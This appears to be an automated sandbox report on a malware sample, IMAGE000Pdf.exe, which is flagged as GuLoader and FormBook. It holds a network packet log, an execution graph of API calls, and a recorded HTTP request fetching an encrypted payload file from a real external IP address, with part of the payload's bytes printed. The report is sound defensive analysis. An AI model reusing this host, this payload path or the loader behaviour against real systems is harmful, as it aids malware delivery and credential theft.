                                    Nov 4, 2024 16:08:44.938281059 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938291073 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938301086 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938325882 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938350916 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938393116 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938405991 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938416004 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938427925 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938433886 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938441992 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938463926 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938478947 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938499928 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938513041 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938539982 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:44.938554049 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:44.938577890 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.050926924 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.050972939 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.050987005 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.050997019 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051009893 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051022053 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051023006 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051035881 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051052094 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051084042 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051115990 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051129103 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051141024 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051151991 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051167965 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051198959 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051222086 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051234007 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051246881 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051260948 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051269054 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051302910 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051348925 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051359892 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051372051 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051395893 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051429033 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051469088 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051481009 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051491976 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051503897 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051515102 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051517963 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051564932 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051580906 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051589012 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051594973 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051625013 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051647902 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051656008 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051668882 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051698923 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051722050 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051784039 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051796913 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051808119 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051817894 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051827908 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051836967 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051837921 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051868916 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051883936 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.051959038 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051971912 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051983118 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.051992893 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052004099 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052010059 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052038908 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052082062 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052098036 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052110910 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052120924 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052130938 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052140951 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052143097 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052154064 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052170038 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052200079 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052229881 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052242041 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052269936 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052292109 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052350044 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052362919 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052373886 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052385092 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052396059 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052397966 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052407980 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052417040 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052421093 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052433968 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052450895 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052476883 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052638054 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052649021 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052654028 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052664042 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052680969 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052690983 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052694082 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052700996 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052705050 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052719116 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052727938 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052738905 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052742004 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052773952 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052791119 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052911043 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052923918 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052936077 CET8049845173.249.193.48192.168.2.5
                                    Nov 4, 2024 16:08:45.052957058 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:08:45.052979946 CET4984580192.168.2.5173.249.193.48
                                    Nov 4, 2024 16:09:32.638856888 CET4984580192.168.2.5173.249.193.48
                                    • 173.249.193.48
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549845173.249.193.48804676C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:08:43.879375935 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache
                                    Nov 4, 2024 16:08:44.574017048 CET1236INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Sun, 03 Nov 2024 23:10:02 GMT
                                    Accept-Ranges: bytes
                                    ETag: "1ec6f782452edb1:0"
                                    Server: Microsoft-IIS/10.0
                                    Date: Mon, 04 Nov 2024 15:08:44 GMT
                                    Content-Length: 287296
                                    Data Raw: 4d 7e 7a b5 5c 6d f1 d2 1d de 3a 53 65 87 2e 73 e2 70 9d ef f4 05 b9 ac 5d c8 ab e3 a8 f7 52 37 c2 68 b8 fc e4 ff a5 3a ba 04 1b 64 ce d4 38 87 e0 d7 71 ab 05 09 bd 98 51 64 0f 32 02 b2 a8 19 20 78 2f f5 96 83 a8 ba a3 2f dd 9b 5f 3f ba d0 36 9f 15 db 37 0a 62 06 16 52 07 c7 b8 1b 67 39 6d 66 12 d8 9a bc 3b d4 e1 b7 03 6b 11 aa da ea e6 4a af 66 2b 48 ed af da fe cf 03 51 b9 33 23 65 60 9c 44 0f 6c bf 57 ad ab 9d 60 a3 e3 8c 42 d9 1e a8 f4 b3 47 0d df 71 6c 10 9a c2 c8 d6 b3 53 62 c5 6d d8 ba ad b3 2c 72 a2 d7 76 47 8d 0c 58 a6 6e 28 5c ad 65 67 db cf 70 31 dd 40 4d 2a 5c 53 46 fa 57 e5 b0 9c 14 b6 e9 2d 80 e3 40 2e fc 9b 50 f1 13 ff c4 e0 d7 5d 80 2c b0 b6 bf f0 ca eb f2 b5 a7 ae d3 54 7a e2 84 9f 4a d0 d0 db 6d 5a 5f 33 7e cd 6d 51 2e da 0d 51 c5 a0 ee 19 36 9a bf 59 1b 02 99 91 ac 7e d9 75 a2 ce 57 c0 d6 78 27 e7 fb e5 cd 89 e7 c1 6f 55 02 d0 b0 83 6e b3 a9 b1 e9 29 14 70 3c 8d 81 a9 12 e3 fb e7 34 ba e5 01 16 01 a3 c1 12 d8 cd 31 48 ff 77 7c 2b dd a6 5e 51 3c 97 b1 ea 25 c9 3a 7a c7 f5 fe 9d ba [TRUNCATED]
                                    Data Ascii: M~z\m:Se.sp]R7h:d8qQd2 x//_?67bRg9mf;kJf+HQ3#e`DlW`BGqlSbm,rvGXn(\egp1@M*\SFW-@.P],TzJmZ_3~mQ.Q6Y~uWx'oUn)p<41Hw|+^Q<%:zZhc)v/jRxBl,T*'ZJfhd>68{{?m_Kvm9+V68wS5)/_2]NP)Tnnx4[5P7P}]A_XT|=UXLWqOk`D./U{z"8i!RF.7"_DTbE|uscs&!E2J8#)Y;H&NCe=>1@4vA*?'GICRpR.MK?.&hi;I1&BM\4"$]r"Yqb+fJN+}_/5#E)1\vpNd{; NJb1-BGs:N$8<O#/2R+H:kzfc$[hQ~.7}|M]'IwszR.TXS:`EMrAG2K}na}!]uSISLr
                                    Nov 4, 2024 16:08:44.574126005 CET1236INData Raw: 2d 95 40 ef 10 bf d3 7e fa a1 82 87 ce ee f4 e1 07 b3 1b 40 cb 36 7d 52 2a 98 4d 50 1d 5d 9e 0e 5a 0b 46 db 5a 6a 07 f1 b5 97 30 70 21 cb 40 9f 95 ad 5c 3b 3a 76 e7 44 7e 1f e3 61 68 eb 85 06 ab d9 dd dc 9b 8c fe 5a bf 57 c3 69 ae be 3b f8 2f 72
                                    Data Ascii: -@~@6}R*MP]ZFZj0p!@\;:vD~ahZWi;/r^WC+0jVA3F:sb>$99Sm8hT:B.+}&6?Y[&a25CmTM}P?oro1M:ivzF9*#si&=\"F
                                    Nov 4, 2024 16:08:44.574137926 CET1236INData Raw: 2b 0b d9 66 4a 4e 93 94 c3 18 2b c6 7d 5f da 2f 35 b9 d0 9b 23 ec b6 45 f3 b1 a1 29 f7 10 31 b6 87 e3 f6 5c 76 70 4e 8e f5 64 bf 8d f9 aa 7b f2 a1 fb bd e9 1f a9 1d e4 3b eb 20 91 e3 ed 4e 02 bb 4a a6 bb d9 b9 62 b1 a7 80 d2 e1 fd ec 31 b7 96 2d
                                    Data Ascii: +fJN+}_/5#E)1\vpNd{; NJb1-BGs:N$8<O#/2R+H:kzfc$[hQ~.7}|M]'IwszR.TXS:`EMrAG2
                                    Nov 4, 2024 16:08:44.574150085 CET1236INData Raw: 38 77 19 53 35 0c b9 29 b6 a8 84 95 2f 5f a0 85 32 f2 5d 4e 1c 50 29 c6 54 c3 6e 95 fd cc 95 eb 6e 78 34 b7 f1 f9 c0 fb b3 5b 35 11 50 ba 37 c8 50 7d b0 ed 5d 1d 41 e5 cc 9b d3 5f 17 84 58 1b 12 54 98 83 1d e2 f2 7c 3d 8b ba 30 f5 8a 58 a0 4c d3
                                    Data Ascii: 8wS5)/_2]NP)Tnnx4[5P7P}]A_XT|=0XLqO;dD./U{Z"8i!RF.7"_DTbE|uscs&!E2J8#)Y;H&NCe=>1@4vA*?'GICRpR.MK?.&h
                                    Nov 4, 2024 16:08:44.574161053 CET1236INData Raw: 90 c4 b3 3f 27 d5 33 a9 80 3d 78 3e 6a ad fb 02 bd b0 a3 1e 71 25 8e c6 50 e1 fb 19 19 27 0b 90 06 36 db 17 dd e6 40 22 81 08 7a 9d 29 02 ff cf 05 48 d2 17 8d ed 60 8a a2 60 3d 4c 10 2a f5 00 fe ba 36 44 62 3d 61 dc b4 6a ee da 47 cc 74 bf 63 18
                                    Data Ascii: ?'3=x>jq%P'6@"z)H``=L*6Db=ajGtc>N/?IMX*wH:^W]-uOb-i#OU`tjo!\>C|-d^Q<E:zC/efyjPi (n,is
                                    Nov 4, 2024 16:08:44.574173927 CET1236INData Raw: 5c ff 68 83 c4 c6 16 2d 30 17 f8 c0 d9 97 fb 95 97 6e 7c d0 09 38 2d ae d7 0f 0c 88 fc b8 7f 5a 13 60 bc 14 9c 01 33 60 f2 8e a6 25 97 2e 9f 66 a0 e6 e3 e7 e4 2d 1e 43 3c ad f9 ce e8 1a 93 a3 6f 12 aa 41 ea 08 69 25 d0 70 81 da fc 35 00 62 97 d4
                                    Data Ascii: \h-0n|8-Z`3`%.f-C<oAi%p5bB^R,tvX7{m^ .<%#l0%UH[sgj!j}]9oZfF)[uBC8A$(:24Mb}
                                    Nov 4, 2024 16:08:44.574233055 CET1236INData Raw: 02 dd c5 c8 e1 17 01 2a 65 8f f7 0d ed 70 ca dc ad b5 10 6f f6 26 12 5c e9 10 dd 0f 21 27 2c b2 f7 6b 01 13 46 f0 93 d9 ca 93 96 4f 96 d6 3a 82 3b f9 1b 15 de 87 4b d5 a6 c3 7d 9e 73 78 14 23 f5 d4 57 fc 5a 21 ce 72 b0 39 62 27 63 24 97 f2 19 51
                                    Data Ascii: *epo&\!',kFO:;K}sx#WZ!r9b'c$QYmgXa,|lD0eU'Qk&"F[Vno6 HZkVf=[;sA/d#1dNJtm;,eoTSs
                                    Nov 4, 2024 16:08:44.574244976 CET1236INData Raw: c5 b5 94 a0 e1 bf f1 84 8a bd a8 c3 7e 68 25 61 26 09 e5 6d db 4d ca 16 5e a5 b3 ec af f1 48 43 51 f7 58 a9 9f 20 5b 98 55 78 17 f4 86 15 1e b3 29 82 97 30 bc 8f 83 7b e9 9e 3d 1d c3 d6 3c d5 b0 f9 f3 36 60 59 50 a5 d1 38 cb ff 93 df 8c 56 3d 06
                                    Data Ascii: ~h%a&mM^HCQX [Ux)0{=<6`YP8V=jceoYD`E~U.M66v;9yN)?@ia-%uq{NHs{|QV"j6Zhn@~,d>68\2Zj5p @EIxv
                                    Nov 4, 2024 16:08:44.574258089 CET1236INData Raw: 26 ff 72 74 d5 d9 7a 4a 18 f7 e0 1b c4 8e 07 a2 ce 18 a7 cf e6 69 5a 79 8b 4c 78 4a 13 87 d4 14 bc 33 7f 24 3d 1a 95 b2 a9 df 27 eb 84 94 1f f0 d2 a6 11 dd 94 c2 0b d6 2a cb 09 f6 32 36 c8 f7 f7 79 bf 35 74 e2 8b 07 ee 3b e3 86 32 38 54 96 17 29
                                    Data Ascii: &rtzJiZyLxJ3$='*26y5t;28T)6rb~GSGvz>xx['YGRM'FE7Fmh%T+7R7[Nm HG*B3YqmZ~)~N-6ha'g|x\vp--z3[63B
                                    Nov 4, 2024 16:08:44.574270010 CET1236INData Raw: f8 f4 b5 3d a3 a8 6e 88 d4 f4 55 0f 18 50 39 1e f2 1b fe a1 ef 65 87 00 e0 f3 f0 01 14 d8 ac 38 61 12 24 a8 33 36 33 b8 d6 e5 70 77 08 61 f8 c2 ad d8 16 50 b3 51 45 61 82 73 9c 3a 97 b6 39 6c 7b 0a 37 e3 bb 9b ec eb 5d 57 43 56 f6 36 fd 53 0f f0
                                    Data Ascii: =nUP9e8a$363pwaPQEas:9l{7]WCV6St+ZGLeahYO/JzR&c!*RLZ.u6-ikRxZ.ToOoxm95V)EWn1!mO'*g x4[KDR1b(
                                    Nov 4, 2024 16:08:44.579205036 CET1236INData Raw: df a6 1a 79 1d 10 89 a3 46 87 b4 30 59 ad 2a 3a c6 3c 7f 68 76 f4 e5 8a 7d 53 d6 01 0b 45 5d 96 14 a4 9f 3f 30 14 c7 ad 6d a9 80 a7 f7 24 d8 67 c8 79 7f b2 04 fe ab 21 d3 6b 42 35 8d be 68 a7 98 8b d9 95 48 ca d1 c5 cb b4 b2 cd 44 ae 19 bf 3f fa
                                    Data Ascii: yF0Y*:<hv}SE]?0m$gy!kB5hHD?LIahI\J:5 /mq?P9nsjyYpnv!cu#R.h"sz%?=q(7[6BW^:mCD`8"


                                    Click to jump to process

                                    Click to jump to process

                                    Click to jump to process

                                    Target ID:0
                                    Start time:10:07:53
                                    Start date:04/11/2024
                                    Path:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\IMAGE000Pdf.exe"
                                    Imagebase:0x400000
                                    File size:915'632 bytes
                                    MD5 hash:53441F2DE2D573F3B2E4FB35C248229B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2445993498.0000000005213000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:10:08:35
                                    Start date:04/11/2024
                                    Path:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\IMAGE000Pdf.exe"
                                    Imagebase:0x400000
                                    File size:915'632 bytes
                                    MD5 hash:53441F2DE2D573F3B2E4FB35C248229B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3000369795.0000000034940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:28.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:18.5%
                                      Total number of Nodes:704
                                      Total number of Limit Nodes:17
                                      execution_graph 2240 4034a2 SetErrorMode GetVersion 2241 4034e1 2240->2241 2242 4034e7 2240->2242 2243 4067e3 5 API calls 2241->2243 2330 406773 GetSystemDirectoryW 2242->2330 2243->2242 2245 4034fd lstrlenA 2245->2242 2246 40350d 2245->2246 2333 4067e3 GetModuleHandleA 2246->2333 2249 4067e3 5 API calls 2250 40351b 2249->2250 2251 4067e3 5 API calls 2250->2251 2252 403527 #17 OleInitialize SHGetFileInfoW 2251->2252 2339 4063ee lstrcpynW 2252->2339 2255 403573 GetCommandLineW 2340 4063ee lstrcpynW 2255->2340 2257 403585 2341 405cf0 2257->2341 2260 4036d4 GetTempPathW 2345 403471 2260->2345 2262 4036ec 2263 4036f0 GetWindowsDirectoryW lstrcatW 2262->2263 2264 403746 DeleteFileW 2262->2264 2268 403471 12 API calls 2263->2268 2355 403015 GetTickCount GetModuleFileNameW 2264->2355 2265 405cf0 CharNextW 2267 4035c3 2265->2267 2267->2265 2274 4036bf 2267->2274 2275 4036bd 2267->2275 2269 40370c 2268->2269 2269->2264 2271 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2269->2271 2270 40375a 2272 40380d 2270->2272 2276 4037fd 2270->2276 2280 405cf0 CharNextW 2270->2280 2273 403471 12 API calls 2271->2273 2489 4039e3 2272->2489 2278 40373e 2273->2278 2472 4063ee lstrcpynW 2274->2472 2275->2260 2383 403abd 2276->2383 2278->2264 2278->2272 2297 403779 2280->2297 2283 403947 2286 4039cb ExitProcess 2283->2286 2287 40394f GetCurrentProcess OpenProcessToken 2283->2287 2284 403827 2496 405a54 2284->2496 2292 403967 LookupPrivilegeValueW AdjustTokenPrivileges 2287->2292 2293 40399b 2287->2293 2290 4037d7 2473 405dcb 2290->2473 2291 40383d 2439 4059bf 2291->2439 2292->2293 2296 4067e3 5 API calls 2293->2296 2300 4039a2 2296->2300 2297->2290 2297->2291 2303 4039b7 ExitWindowsEx 2300->2303 2306 4039c4 2300->2306 2301 403853 lstrcatW 2302 40385e lstrcatW lstrcmpiW 2301->2302 2302->2272 2305 40387a 2302->2305 2303->2286 2303->2306 2308 403886 2305->2308 2309 40387f 2305->2309 2504 40140b 2306->2504 2307 4037f2 2488 4063ee lstrcpynW 2307->2488 2500 4059a2 CreateDirectoryW 2308->2500 2442 405925 CreateDirectoryW 2309->2442 2315 40388b SetCurrentDirectoryW 2316 4038a6 2315->2316 2317 40389b 2315->2317 2447 4063ee lstrcpynW 2316->2447 2503 4063ee lstrcpynW 2317->2503 2322 4038f2 CopyFileW 2327 4038b4 2322->2327 2323 40393b 2324 4061b4 36 API calls 2323->2324 2324->2272 2326 40642b 17 API calls 2326->2327 2327->2323 2327->2326 2329 403926 CloseHandle 2327->2329 2448 40642b 2327->2448 2465 4061b4 MoveFileExW 2327->2465 2469 4059d7 CreateProcessW 2327->2469 2329->2327 2331 406795 wsprintfW LoadLibraryExW 2330->2331 2331->2245 2334 406809 GetProcAddress 2333->2334 2335 4067ff 2333->2335 2338 403514 2334->2338 2336 406773 3 API calls 2335->2336 2337 406805 2336->2337 2337->2334 2337->2338 2338->2249 2339->2255 2340->2257 2342 405cf6 2341->2342 2343 4035aa CharNextW 2342->2343 2344 405cfd CharNextW 2342->2344 2343->2260 2343->2267 2344->2342 2507 40669d 2345->2507 2347 403487 2347->2262 2348 40347d 2348->2347 2516 405cc3 lstrlenW CharPrevW 2348->2516 2351 4059a2 2 API calls 2352 403495 2351->2352 2519 405f13 2352->2519 2523 405ee4 GetFileAttributesW CreateFileW 2355->2523 2357 403055 2381 403065 2357->2381 2524 4063ee lstrcpynW 2357->2524 2359 40307b 2525 405d0f lstrlenW 2359->2525 2363 40308c GetFileSize 2378 403186 2363->2378 2382 4030a3 2363->2382 2366 40318f 2367 4031bf GlobalAlloc 2366->2367 2366->2381 2565 40345a SetFilePointer 2366->2565 2541 40345a SetFilePointer 2367->2541 2368 4031f2 2372 402fb1 6 API calls 2368->2372 2371 4031da 2542 40324c 2371->2542 2372->2381 2373 4031a8 2375 403444 ReadFile 2373->2375 2377 4031b3 2375->2377 2376 402fb1 6 API calls 2376->2382 2377->2367 2377->2381 2530 402fb1 2378->2530 2379 4031e6 2379->2379 2380 403223 SetFilePointer 2379->2380 2379->2381 2380->2381 2381->2270 2382->2368 2382->2376 2382->2378 2382->2381 2562 403444 2382->2562 2384 4067e3 5 API calls 2383->2384 2385 403ad1 2384->2385 2386 403ad7 2385->2386 2387 403ae9 2385->2387 2594 406335 wsprintfW 2386->2594 2595 4062bc 2387->2595 2391 403b38 lstrcatW 2392 403ae7 2391->2392 2586 403d93 2392->2586 2393 4062bc 3 API calls 2393->2391 2396 405dcb 18 API calls 2397 403b6a 2396->2397 2398 403bfe 2397->2398 2400 4062bc 3 API calls 2397->2400 2399 405dcb 18 API calls 2398->2399 2401 403c04 2399->2401 2408 403b9c 2400->2408 2402 403c14 LoadImageW 2401->2402 2403 40642b 17 API calls 2401->2403 2404 403cba 2402->2404 2405 403c3b RegisterClassW 2402->2405 2403->2402 2406 40140b 2 API calls 2404->2406 2409 403c71 SystemParametersInfoW CreateWindowExW 2405->2409 2438 403cc4 2405->2438 2410 403cc0 2406->2410 2407 403bbd lstrlenW 2412 403bf1 2407->2412 2413 403bcb lstrcmpiW 2407->2413 2408->2398 2408->2407 2411 405cf0 CharNextW 2408->2411 2409->2404 2418 403d93 18 API calls 2410->2418 2410->2438 2416 403bba 2411->2416 2415 405cc3 3 API calls 2412->2415 2413->2412 2414 403bdb GetFileAttributesW 2413->2414 2417 403be7 2414->2417 2419 403bf7 2415->2419 2416->2407 2417->2412 2420 405d0f 2 API calls 2417->2420 2421 403cd1 2418->2421 2600 4063ee lstrcpynW 2419->2600 2420->2412 2423 403d60 2421->2423 2424 403cdd ShowWindow 2421->2424 2601 405529 OleInitialize 2423->2601 2426 406773 3 API calls 2424->2426 2428 403cf5 2426->2428 2427 403d66 2429 403d82 2427->2429 2430 403d6a 2427->2430 2431 403d03 GetClassInfoW 2428->2431 2433 406773 3 API calls 2428->2433 2432 40140b 2 API calls 2429->2432 2436 40140b 2 API calls 2430->2436 2430->2438 2434 403d17 GetClassInfoW RegisterClassW 2431->2434 2435 403d2d DialogBoxParamW 2431->2435 2432->2438 2433->2431 2434->2435 2437 40140b 2 API calls 2435->2437 2436->2438 2437->2438 2438->2272 2440 4067e3 5 API calls 2439->2440 2441 403842 lstrcatW 2440->2441 2441->2301 2441->2302 2443 403884 2442->2443 2444 405976 GetLastError 2442->2444 2443->2315 2444->2443 2445 405985 SetFileSecurityW 2444->2445 2445->2443 2446 40599b GetLastError 2445->2446 2446->2443 2447->2327 2460 406438 2448->2460 2449 406683 2450 4038e5 DeleteFileW 2449->2450 2625 4063ee lstrcpynW 2449->2625 2450->2322 2450->2327 2452 406651 lstrlenW 2452->2460 2455 40642b 10 API calls 2455->2452 2456 4062bc 3 API calls 2456->2460 2457 406566 GetSystemDirectoryW 2457->2460 2458 406579 GetWindowsDirectoryW 2458->2460 2459 40669d 5 API calls 2459->2460 2460->2449 2460->2452 2460->2455 2460->2456 2460->2457 2460->2458 2460->2459 2461 4065ad SHGetSpecialFolderLocation 2460->2461 2462 40642b 10 API calls 2460->2462 2463 4065f4 lstrcatW 2460->2463 2623 406335 wsprintfW 2460->2623 2624 4063ee lstrcpynW 2460->2624 2461->2460 2464 4065c5 SHGetPathFromIDListW CoTaskMemFree 2461->2464 2462->2460 2463->2460 2464->2460 2466 4061d5 2465->2466 2467 4061c8 2465->2467 2466->2327 2626 40603a 2467->2626 